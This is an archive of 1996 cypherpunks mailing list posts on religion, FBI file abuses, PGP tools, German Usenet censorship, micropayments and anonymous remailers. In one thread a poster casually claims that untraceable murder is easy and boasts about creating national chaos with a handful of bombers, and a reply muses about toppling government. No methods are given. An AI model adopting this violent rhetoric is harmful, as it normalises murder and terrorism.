In-Reply-To: <199606101537.RAA11056@basement.replay.com>
Message-ID: <199606101932.PAA26136@apollo.gti.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

An entity claiming to be Anonymous wrote:
: 
: Would you describe Christianity as a cult?  If not, why not?
: 

Cult == "The church down the street"

- -- 
    Mark Rogaski   | Why read when you can just sit and |      Member
  GTI System Admin |         stare at things?           | Programmers Local
  wendigo@gti.net  | Any expressed opinions are my own  |     # 0xfffe
 wendigo@pobox.com | unless they can get me in trouble. |     APL-CPIO


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMbx4IQ0HmAyu61cJAQH8XgP/RpFrMMzKZCkwLb/bOVZkOMrv4QhfBRmO
MhIcg+jttI0Bqy8Dp0BmkJbpqHS9tSIKZjoJXRkT/Hb3aGi2G8wvoxIAjoDchoPt
HwAgkI/YV1zW4kXdWHmm7H3WIfr5va/wJyjQHlrqawtt5XKRfE2nIXCZW5tlkdv9
WdSL5eWbs5w=
=MZfs
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Tue, 11 Jun 1996 13:18:16 +0800
To: "'cypherpunks@toad.com>
Subject: RE: Slander of Catholic Church
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-960610225421Z-9034@abash1.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: 	Cardinal Timothy May
>
>(Who believes all cults and religions are basically the same shuck and
>jive, and who thinks the "Church of Scientology" is actually a little
>bit
>less foolish that the Church of Mormon, with its "baptism of dead
>ancestors" into the Church, the funny underwear people have to secretly
>wear, etc. However, I have great respect for the practical tactics of
>the
>Mormons, and no respect for the day to day behavior of the CoS.)
................................................................

With apologies to Perry, who could give a flip, my day will not be
complete until Tim tells us about the funny underwear (and how he knows
about it).


>    ..
>Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 11 Jun 1996 14:17:30 +0800
To: cypherpunks@toad.com
Subject: Re: whitehouse queries files on political enemies
Message-ID: <199606110000.RAA08427@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


OBCrypto: William Safire, in his 6/10/96 column on this subject, says,
"Under Freeh, the anti-encryption zealot hand-picked by the man whose name
was used on the phony requisitions, the Justice Department's most
confidential file room has become a walk-in closet for White House pols."


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 11 Jun 1996 06:03:46 +0800
To: cypherpunks@toad.com
Subject: Re: Anti-Scientologists
Message-ID: <199606101537.RAA11056@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



James A. Donald wrote:
>
> At 07:13 PM 6/9/96 +0200, Anonymous wrote:
> >Truth #1: It is a religion
> >Truth #2: It is no longer a cult, since the leader is dead.
> 
> Truth number 3:  It charges fifty thousand dollars or so for
> secrets of "religous technology" that are available free of charge
> on the internet.

So?


Declan wrote:

> Truth #2: Cults can exist in the absence of a charismatic leader.

Would you describe Christianity as a cult?  If not, why not?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Wed, 12 Jun 1996 05:52:27 +0800
To: jt@freenix.fr (Jerome Thorel)
Subject: Re: lambda 2.08 (1/2) - Surveillance du contenu : l'oeil biais_
Message-ID: <9606111452.AA07175@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 10 Jun 96 at 19:08, Jerome Thorel wrote:

> DANS LE NUMERO --> 2.08 <-- du bulletin lambda
> http://www.freenix.fr/netizen/
<snip>

> - Les agents, lors des PV, ne signent plus par leur nom, mais par
> des numeros d'immatriculation, a remarque la revue Chroniques

Bonjour Jerome!

Que signifie PV?

Traduction libre par: / non-official translation by: 
jf_avon@citenet.net

... The agents, during PVs(?), are not signing with their own names anymore 
but with an ID number, pointed out "Chroniques" magazine...


La version anglaise de ce texte a-t-elle ete envoye a 
cypherpunks@toad.com?

Si non, pourriez-vous l'y envoyer.  Aussi, en faire parvenir une 
copie anglaise a jimbell@pacifier.com, ca sera du plus grand interet 
pour lui.

Salutations

JFA
 DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal
 JFA Technologies, R&D consultants: physicists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Tue, 11 Jun 1996 15:03:04 +0800
To: cypherpunks@toad.com
Subject: MacPGP Control (Front end for Macs)
Message-ID: <v01540b06ade288354598@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


I saw this on the Web. I've never used it.

-------------------------------------8>-----------------------------
MacPGP Control (or MPGPC for short) is an AppleScript application that offers an
easy-to-use, more Macintosh friendly user interface to MacPGP.

MacPGP Control relies on your AppleScript-aware version of MacPGP to
perform encryption
and decryption. For information on how to obtain MacPGP in the USA or
Canada, first refer to that site using your FTP client (Anarchie, Fetch,
etc...) or a World Wide Web browser (Netscape, MacWeb, etc...). For non-USA
citizens, information on how to obtain MacPGP is available at Ståle
Schumacher's International PGP Home Page.

The main features of MPGPC are grouped into three categories:

       MacPGP related features
       Eudora and Claris Em@iler related features
       Macintosh related features

The current version of MacPGP Control is 1.0 fc 1. You need, among other
things, the
Scriptable Finder to run MPGPC. If you don't have it or cannot obtain a
legal copy, I cannot help you and you will be wasting your time and money
downloading this software. All other components are available.

MacPGP Control is US$15 shareware.
-------------------------------------8>-----------------------------

For details see:

  http://www.deepeddy.com/pgp/

-------------------------------------------------------------------------
Steven Weller                      |  Technology (n):
                                   |
                                   |     A substitute for adulthood.
stevenw@best.com                   |     Popular with middle-aged men.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 11 Jun 1996 12:59:59 +0800
To: Greg Broiles <gbroiles@netbox.com>
Subject: Re: Electronic Signature Act Of 1996
In-Reply-To: <2.2.16.19960610095811.1d4f15ba@mail.io.com>
Message-ID: <Pine.SUN.3.93.960610182335.19662A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 10 Jun 1996, Greg Broiles wrote:

> At 04:24 PM 6/5/96 -0400, Black Unicorn wrote:
> 
> >Please remember that the UCC's application is generally restricted to the 
> >sales of goods or acts between merchants.
> 
> I'll "remember" this only insofar as it reminds me to read your other
> messages with a more skeptical eye. I hope you pay more attention to
> accuracy when you're at work.

In that I posted nearly the entire statute of frauds section, which was
the subject of the above comment in context, you seem to have taken the
above out of context, and applied it too broadly.

> --
> Greg Broiles                |"Post-rotational nystagmus was the subject of
> gbroiles@netbox.com         |an in-court demonstration by the People
> http://www.io.com/~gbroiles |wherein Sgt Page was spun around by Sgt
>                             |Studdard." People v. Quinn 580 NYS2d 818,825.
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Tue, 11 Jun 1996 15:47:22 +0800
To: cypherpunks@toad.com
Subject: Re: Report from Germany on "backdoor" net-censorship
Message-ID: <v02140b00ade2903143e5@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


Ulf forwards:
[...]
> Proof of origin of
> critical articles will be processed by the server, archived in a data
> base observing privacy laws, and stored at a central facility.
> Furthermore, sample news articles will be suject to detailed legal
> evaluation. Should this result in suspicion or proof of transportation
> of illegal contents, the ICTF can launch various steps to work against
> propagation of these contents. For example, it can arrange for
> blocking of complete newsgroups or retrospect "Cancel" of articles
> already transmitted. ICTF can direct possible criminal investigation
> with help of its data base.
[...]

Did anyone else hear "Deutchland Uber Alles" in the back of their mind
while reading this?  I wonder if the gestapo.de domain name is taken
yet...

> The special problem of the News service is that information can be
> distributed world-wide, yet anonymously. This is different of at least
> fundamentally more difficult in other parts of the Internet, so that
> the volume of critical content in the News is comparably high.

It is kinda sad that these German ISPs who claim that politicians and
governments do not understand the nature of the net seem themselves
guilty of not understand that all internet traffic is effectively
anonymous, Usenet is just obviously anonymous.

> The
> ICTF will register the information availible on the origin of news
> and store them in a data base as to make it possible to determine
> who has sent an article or disguised the real author's identity, in
> retrospect.

"Papieren bitte..."  Yellow stars, pink triangles, hmmm... seems to me
that the Germans have a rather poor history regarding registration and
identity services, but they are once again proving to be good at
encouraging "collaborators."

jim








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 11 Jun 1996 14:53:36 +0800
To: Bruce Baugh <bruce@aracnet.com>
Subject: Re: whitehouse web incident, viva la web revolution
In-Reply-To: <2.2.32.19960606051847.006e9b18@mail.aracnet.com>
Message-ID: <Pine.LNX.3.93.960610191020.922D-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 5 Jun 1996, Bruce Baugh wrote:

<concerning facism--you know what you wrote>

	Thanks. You said it much better than I could have. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 11 Jun 1996 15:11:22 +0800
To: John Young <jya@pipeline.com>
Subject: Re: Terrorism Hysteria on the Net
In-Reply-To: <199606051227.MAA00334@pipe2.t2.usa.pipeline.com>
Message-ID: <Pine.LNX.3.93.960610191530.922E-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 5 Jun 1996, John Young wrote:

> Today's USA has a pair of front page stories: 
> "Feds ready anti-terror cyberteam" and "Terrorism on the Net -- Post-Cold
> War hysteria or a national threat?" 
> They lay out the nightmares and the valiant TLA-daydreams to out-fund the
> hackers and out-flummox the public. 
> "You bring me a select group of hackers and within 90 days I'll bring this
> country to its knees, " says Jim Settle, retired director of the FBI's
> computer crime squad. 

	Give me 15 well trained soldiers(near special forces level) and I
can do it in less than 60 days. Without touching a computer. 

	There was a blue print published by Omni Magazine in the mid to
late 80's written by Henry Kissinger (IIRC). 

	Give me 15 McVey's with the ability to follow orders and I'll have
this country in chaos in 2 weeks. 

	It isn't that hard, it is just that almost everyone prefers the
current system to total death & destruction chaos that follows a strong
government collapsing. Society holds itself together in large part not
because of the rule of law, but becaue most people want it to. 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Durham <bdurham@metronet.com>
Date: Tue, 11 Jun 1996 15:08:10 +0800
To: Benjamin Grosman <bgrosman@healey.com.au>
Subject: Re: New Encryption Algorithm and Program
In-Reply-To: <1.5.4.32.19960610011120.006b41cc@healey.com.au>
Message-ID: <31BCC3E8.DBF@metronet.com>
MIME-Version: 1.0
Content-Type: text/plain


Benjamin Grosman wrote:

> ... for my major assignment I wrote an encryption program under Turbo
> Pascal for Dos, version 7.0, and for this program I developed the algorithm
> myself...

> Many thanks....
> Ben

Ben:
   If you can, you may want to get a hold of this book:

   Applied Cryptography by Bruce Schneier
   John Wiley & Sons, Inc. ISBN 0-471-59756-2

   It is a very good reference that will show you what the public 'state 
of the art' is.  [You might find that you have recreated something that 
has already been broken, or see weaknesses in your cipher like other 
cryptosystems in the book that have their faults exposed...]

    Happy hunting and hacking,
    Brian Durham
    bdurham@metronet.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: awestrop@crl.com (Alan Westrope)
Date: Tue, 11 Jun 1996 16:30:11 +0800
To: cypherpunks@toad.com
Subject: Denver area meeting, Saturday, 6/15, 2 pm
Message-ID: <5zNvxo9g/c/M090yn@crl.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

This month we'll meet on Saturday so that a couple of folks will
be able to attend Father's Day festivites.  As always, we'll meet
at the Tivoli; send email for directions.

ps -- I haven't been announcing local meetings to the list because
I unsubscribed for a few months...just thought I'd advise everyone
that this meeting will be on a Saturday.  Besides, info about local
meetings is now available at http://www.command.com.inter.net/
thanks to some friends who are frequent attendees.


Alan Westrope     PGP public key:  http://www.nyx.net/~awestrop
<awestrop@nyx.net>
<awestrop@crl.com>
PGP 0xB8359639:   D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMbze8VRRFMq4NZY5AQEFlwP/VqxwvfBt4RH1mk+OIuZe16jXFb+NMoIt
i6f1p74BL4XX9TdOobxL/Rnc+tswE8fDCtudESB9vwBGdqaBELF1uNZVQ7/1E7iq
8m7Q5vdhHTmhX/2zqQlCNIdmM1mtyJrj86nSSMJ+i1Z1pdi1kSw1TvSNM7e7eMpL
8vZSpxIZy6Y=
=FDqe
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 11 Jun 1996 16:10:31 +0800
To: cypherpunks@toad.com
Subject: Re: Internet solution for law enforcement
In-Reply-To: <Pine.GUL.3.93.960607215457.1728A-100000@Networking.Stanford.EDU>
Message-ID: <Pine.LNX.3.93.960610202827.922H-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 7 Jun 1996, Rich Graves wrote:
> On Fri, 7 Jun 1996 caal@hopf.dnai.com wrote:
> > Has anyone seen this yet?  Looks like it's two weeks old.  Internet Police!
> > >[BizWire]    5/20/96
> > >        (SUN/PSI-INTL)(SUNW) PSI International, Sun partner, unveils Java-
> > >        based Internet solution for law enforcement agencies; "Internet in
> > >        Blue" Police Internet/Intranet Application Suite Available in July
> > >        1996 
> 
> Is this a joke, or has the world gone completely batty?

	Is this an exclusive-or?

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 11 Jun 1996 16:17:50 +0800
To: hallam@Etna.ai.mit.edu
Subject: Re: [NOISE] Buying whales with digicash Re: Anonymous stock trades.
In-Reply-To: <9606081830.AA05221@Etna.ai.mit.edu>
Message-ID: <Pine.LNX.3.93.960610203547.922I-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain



	If you are so bright, why can't you format your line length to
something that fits on an 80 column screen?

On Sat, 8 Jun 1996 hallam@Etna.ai.mit.edu wrote: 
	Apart from hero worship why do you believe that Friedman is not able to say 
anything ridiculous? I found the letter to be ridiculous which is why I remember it. 

 	Since you were so certain that Hess was not a staff member of the Cato institute 
despite being listed as such on their home page is it not just a little possible that 
you might be wrong in this case.

___________________end quoted_________________


	I am not attacking your positions on this, but it would be a lot
easier (well, a little easier) if I could easily READ it. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@clever.net (eric traudt)
Date: Wed, 12 Jun 1996 04:33:23 +0800
To: cypherpunks@toad.com
Subject: [Noise] William Safire on the GAK bastards' other privacy violations.
Message-ID: <v02140b00ade2700d75f4@[204.249.244.13]>
MIME-Version: 1.0
Content-Type: text/plain


WILLIAM SAFIRE: Shame on the FBI


WASHINGTON (Jun 10, 1996 12:00 p.m. EDT) -- Overlooked in the scandal of
Travelgate has been the failure of FBI Director Louis Freeh to protect the
confidential files of citizens from political snoops. Say what you like about J.
Edgar Hoover -- he never let the bureau become a doormat for White House aides.

The background: when President Clinton claimed "executive privilege" to keep
3,000 embarrassing documents from investigators, Congress threatened White House
Counsel Jack Quinn with criminal contempt. To avoid jail, he forked over a
thousand of the least damning documents.

One of them illuminates why Clinton has been stonewalling for years on the rest
of the subpoenaed files. It is a requisition to the "FBI Liaison," ostensibly
from then-White House Counsel Bernard Nussbaum, for the confidential files on
Billy Ray Dale, the travel office employee who had been fired seven months
earlier to make room for a Clinton cousin. The FBI disgorged 22 letters and
reports on Ray alone; he was then besmeared by White House officials in the
press, unjustly prosecuted and financially ruined, before being acquitted by a
jury in two hours.

The requisition for the confidential FBI files was unsigned. The name typed
on it
was Bernard Nussbaum, but Nussbaum now says he had "absolutely no knowledge" of
such a request, and would presumably swear to that. The reason given on the
fraudulent requisition was "access" -- as if Ray were trying to get back
into the
White House, which was untrue.

That was the tip of the iceberg. Despite "executive privilege," Congressman
William Clinger learned that as many as 341 such fraudulent, unsigned requests
for confidential files and name checks were sent under the Nussbaum typed
name to
FBI headquarters. Apparently the snoop was a Clinton political appointee who
preferred anonymity.

The cover story peddled by Clinton aides is that this was a "routine"
updating of
White House files by a stupid clerk that just happened to focus on holdover
Republicans, as well as other Republican political suspects -- including a
former
secretary of state whose aides once improperly snooped into Clinton passport
files. Clinton's lawyers claim that the fraudulently obtained FBI dossiers were
put in a White House vault and nobody looked at them.

What's being done in response to the most egregious invasion of privacy of U.S.
citizens in a generation? Not much. President Clinton says he's sorry, but
continues to stonewall on 2,000 documents; the independent counsel adds
this mess
to his Travelgate list; and the FBI announces a "thorough" investigation by its
in-house counsel, who will rebuke some low-level agent and absolve the boss.

Not good enough. After FBI agents were jerked around to provide political cover
for Clinton patronage moves in 1993, Attorney General Reno and Freeh promised
strict scrutiny of White House requests. They failed abysmally to keep citizens'
confidential files safe from politicians' eyes.

Think of it: Unverified slanders and gossipy tidbits in your FBI file have been
vulnerable to an unsigned form letter from a political partisan hiding behind
another person's name. Under Freeh, the anti-encryption zealot hand-picked
by the
man whose name was used on the phony requisitions, the Justice Department's most
confidential file room has become a walk-in closet for White House pols.

Nobody at Freeh's unbuttoned FBI bothered to ask: What individual wants this and
for what lawful purpose? Can any anonymous bureaucrat requisition, rifle through
and remove confidential records? How come not one agent was required by bureau
policy to ask why not even initials appeared on hundreds of requests to check up
on Republicans?

What a scandalously sloppy way to run a police agency. To entrust the
investigation of this unprecedented hemorrhage of FBI confidentiality to
the same
easily manipulated Justice Department invites a whitewash.

Summer civil libertarians shade their eyes when personal privacy is invaded by
political allies, but this top-level failure to resist an abuse of power dismays
FBI agents in the field. When Clintonites send over for the file on me, Director
Freeh, don't buy their baloney about "seeks access" -- I won't be going to the
White House picnic this summer.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bogdan@ljextra.com
Date: Tue, 11 Jun 1996 17:16:39 +0800
To: cypherpunks@toad.com
Subject: Re: [SF Bay Area] Internet security course at Stanford
Message-ID: <199606110350.XAA17034@mail01.ljextra.com>
MIME-Version: 1.0
Content-Type: text/plain


>
>
>Seen on the net:
>
>
>The Western Institute of Computer Science announces
>a week-long course on
>
>INTERNET SECURITY
>
>taught at Stanford University
>
>July 29 -- August 2, 1996
>
>Course Fee:
>        $1,450 (includes instruction, complete set of course notes,
>        break refreshments, and Tuesday night reception.)
>        $1,575 for registration after July 15

Any guys from this list are gonna take a class for $1500??





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Pettitt <jpp@software.net>
Date: Tue, 11 Jun 1996 17:24:13 +0800
To: cypherpunks@toad.com
Subject: AOL 3.0 and SSL
Message-ID: <2.2.32.19960611040101.00b16bd8@mail.software.net>
MIME-Version: 1.0
Content-Type: text/plain


I see AOL 3.0 how has SSL - does anybody know if they ran the encrypted
pipe out to the browser or stopped it at the AOL host ... since it's
possible to connect to the AOL host via the net the latter would be a
very silly idea ...

John Pettitt, jpp@software.net
VP Engineering, CyberSource Corporation, 415 473 3065
 "Technology is a way of organizing the universe so that man
  doesn't have to experience it." - Max Frisch

PGP Key available at:
http://www-swiss.ai.mit.edu/htbin/pks-extract-key.pl?op=get&search=0xB7AA3705





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 11 Jun 1996 16:48:47 +0800
To: "Igor Chudov @ home" <ichudov@algebra.com>
Subject: Re:
In-Reply-To: <199606082209.RAA19856@manifold.algebra.com>
Message-ID: <Pine.LNX.3.93.960610205205.922M-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 8 Jun 1996, Igor Chudov @ home wrote:

> jim bell wrote:
> > 
> > While I appreciate your...uh...appreciation, let me remind you that part of 
> > my "pronouncements" are that the current political and social system is 
> > are in "the best interests of the inhabitants of this nation" is still an 
> > open question, and many people have agreed with me on this matter. 
> Since corrupt officials are likely to have more anonymous cash that
> phreedom phighters, guess who will win.

	There are more phreedom phighters, and their assets aren't as
public as the officials.

> Also, think about this: lots of people have someone they'd like
> to assassinate but do not actually do it because of lack of anonymity
> and associated hassles (like dealing with assassins non-anonymously,
> abundance of traces, possible confession of the assassin and so on).

	Most people don't kill because they have a built in psychological
block (call it morals if you wish) against killing in cold blood. This is
what makes people like snipers so puzzling and in some sense romantic to
the average person. They _can't_ at a deep level consider calmly and
dispassonately blowing anothers brains all over the wall. Most murders in
this country are either down in the heat of passion, by psychotics/
sociopaths or by professionals, who usually fall into one of the previous
catagories.

	It is almost ridicoulously simple to kill someone in a relatively
untraceable fashion. Any person of average intelligence can do a little
research (say about 3 hours at a decent (non-chicago) library) and spend
an hour or two in thought and come up with a way to target a non- to
moderately public figure with out getting caught. 
	I can give you 4 right off the top of my head that have a
reasonable chance of sucess, and very little chance of discovery. 

	People like *A* president, or similar high profile fiugre would be
much tougher target, but by no means impossible. 

	Contracting with a "professional killer" is really very silly as I
would bet many of them are unreliable and untrustworthy (outside of
Mafia/Gang related killers--they are (IANAE) more like soldiers, doing it
for "country"-- than freelance assians.) There may be professional hitmen
that are reliable, but they tend to be out of the price range of normal
people. 

	Life ain't TV. 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 11 Jun 1996 17:42:35 +0800
To: snow <jya@pipeline.com>
Subject: Re: Terrorism Hysteria on the Net
Message-ID: <199606110418.VAA07752@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:21 PM 6/10/96 -0500, snow wrote:
>On Wed, 5 Jun 1996, John Young wrote:
>
>> "You bring me a select group of hackers and within 90 days I'll bring this
>> country to its knees, " says Jim Settle, retired director of the FBI's
>> computer crime squad. 
>
>	Give me 15 well trained soldiers(near special forces level) and I
>can do it in less than 60 days. Without touching a computer. 
>	There was a blue print published by Omni Magazine in the mid to
>late 80's written by Henry Kissinger (IIRC). 
>	Give me 15 McVey's with the ability to follow orders and I'll have
>this country in chaos in 2 weeks. 
>
>	It isn't that hard, it is just that almost everyone prefers the
>current system to total death & destruction chaos that follows a strong
>government collapsing.

Doesn't this statement represent something of a bias in favor of today's 
system?  Is the "total death and destruction chaos" a function of the 
collapse of that strong government, or the immediate tendency of it to be 
replaced with dictator wannabes?

In other words, if a "strong government" could be brought down with a 
guarantee that nobody would be able to even begin to replace it, might that 
not be an entirely different matter?


>Society holds itself together in large part not
>because of the rule of law, but becaue most people want it to. 

Doesn't this statement contradict the previous statement you made?  If 
there's "chaos" perhaps that's merely because a small group of people is 
trying to take control.  Most people want peace, but it can be disturbed by 
a minority.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 11 Jun 1996 17:22:46 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: PGP key revocation
In-Reply-To: <Pine.GUL.3.93.960610121323.21861C-100000@Networking.Stanford.EDU>
Message-ID: <F75BPD108w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Rich Graves <llurch@networking.stanford.edu> writes:
> If you exchanged private email with me in the last 18 months, encrypted or
> not, in either direction, you should assume that it has been read.

That's right - you can't trust Rich's procmail to have junked any e-mail
reliably. He may have read it all. What a paranoid maroon.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Behlendorf <brian@organic.com>
Date: Tue, 11 Jun 1996 17:56:31 +0800
To: Nick Szabo <szabo@netcom.com>
Subject: Re: Micropayments: myth?
In-Reply-To: <199606060257.TAA16018@netcom.netcom.com>
Message-ID: <Pine.SGI.3.91.960610213300.11005B-100000@fully.organic.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 5 Jun 1996, Nick Szabo wrote:
> Consider a feature fairly independent of the particular payment system: 
> the statement of charges.  Here lies a tradeoff here between completeness 
> and complexity.   On the one hand, merely summarizing charges creates 
> the opportunity for salami frauds, allowing widely distributed false or 
> exaggerated microcharges to go undetected.  Furthermore, parties reading 
> only the summaries get no feedback by which they can adjust their behavior
> to minimize costs.  On the other hand, a statement too complex to
> be easily read also allows fraud, error, and inefficient usage to 
> go unrecognized, because one or both parties cannot understand the 
> rationale for the charges in relation to the presumed agreement on
> terms of service and payment. 

When we are faced with a complex set of interactions with which we expect 
the average person to not only be able to understand, but use, then it's 
always helpful to use metaphors.  Consider the following:


  Many people drive cars.  Those cars require gas.  Gas is "spent" in 
very small amounts at any discrete moment in time, but those who use cars 
are used to paying for gas in lump sums and not necessarily fretting 
about the state of their "gas balance" at every step of the way.  People 
who drive cars have two valuable metrics to gauge their usage of gas and 
the rate at which they spend it: the speedometer and the feul tank 
levels.  When people drive fast, their speedometer is high, and they know 
they are burning gas at a faster rate than when they drive more slowly 
(compensated by the fact that they are getting somewhere faster).  People 
are also used to refilling their gas tank when they get low.


Now, let's consider bridging this metaphor into the micropayments world.  
Imagine that surfing the web is like driving a car - you'll dribble out 
small amounts of money over a period of time, but as long as you watch 
your speedometer (the rate at which you spend money) and the feul tank 
levels (the amount of coinage in your wallet), you are in control of your 
spending rates.  Whether you approve every micropayment explicitly, or 
you set a minimum level below which requests for payments are automagically 
granted, is up to you.  Me, I'd probably be alright with just about any 
site I go to asking for less than $.02 for any action I take.  Anything 
above that, I want to be explicitly asked.  My user interface has a gas 
gauge and a speedometer in the upper-right-hand corner instead of a 
throbbing "N".  When my levels are low, I go visit my bank and "refill" 
my wallet.  Voila!

The billing happens, as others have previously noted, entirely at the 
client side.  There's no reason the wallet or web browser can't keep a 
log of expenditures, and there's no chance for spoofery at that point 
(the wallet knows where it sent money).  

And yes, I am presuming a system involving transfers of digitally signed 
tokens of some sort.  I don't think this is a mistaken presumption.  

	Brian

--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--
brian@organic.com  |  We're hiring!  http://www.organic.com/Home/Info/Jobs/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Tue, 11 Jun 1996 17:23:03 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: Anonymous return addresses
In-Reply-To: <199606082329.QAA14538@jobe.shell.portal.com>
Message-ID: <v03007102ade2846cf37a@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 16:29 -0700 6/8/96, Hal wrote:


>There is no large amount of traffic needed, as each server only sends an
>amount of data equal to one message.  The individual servers do not get
>any information about which message the requestor wants (other than that
>it is one of the 50).  Only by colluding and XOR'ing their bit strings
>can they figure that out.  The same kind of collusion is needed to trace
>a sent message using two remailers, so the security is similar to what we
>get sending messages.

If the message is split into more than one part (to meet the message size
requirement) there is some potential leakage to each server of what message
is being requested. If User a requested 3 messages, then they MAY be
requesting all three parts of a 3 part message (or 2+1). If a record is
kept of the number of requests over time, then there can be some regression
checking based on the ID (ie: If the number of new messages for ANx in the
DB matches the number that User Y requests in the current session). I may
be in error with this thought but it looks like a possible problem.

>Messages would have a finite lifetime and would expire and be removed
>from the database after a while.  The authors propose breaking the
>database up into batches with a fixed number of messages, but I don't
>fully follow the reasoning behind this.  I guess it reduces the load on
>the server when it does its XOR's.

This can also affect the "attack" I speculated on above since it can "leak"
more info. Multi-part messages (or multiple messages to the same recipient)
which are retrieved in one session can be correlated between the groups
(ie: User Y asked for 5 messages [Selected from Groups 1&5] and ANx is the
one AN? that has the requested number of messages in each of the Groups
[ie: 3 from G1 and 2 from G5]).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 11 Jun 1996 19:24:21 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Terrorism Hysteria on the Net
In-Reply-To: <199606110418.VAA07752@mail.pacifier.com>
Message-ID: <Pine.LNX.3.93.960610224644.922U-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 10 Jun 1996, jim bell wrote:

> At 07:21 PM 6/10/96 -0500, snow wrote:
> >On Wed, 5 Jun 1996, John Young wrote:
> >> "You bring me a select group of hackers and within 90 days I'll bring this
> >current system to total death & destruction chaos that follows a strong
> >government collapsing.
> 
> Doesn't this statement represent something of a bias in favor of today's 
> system?  Is the "total death and destruction chaos" a function of the 
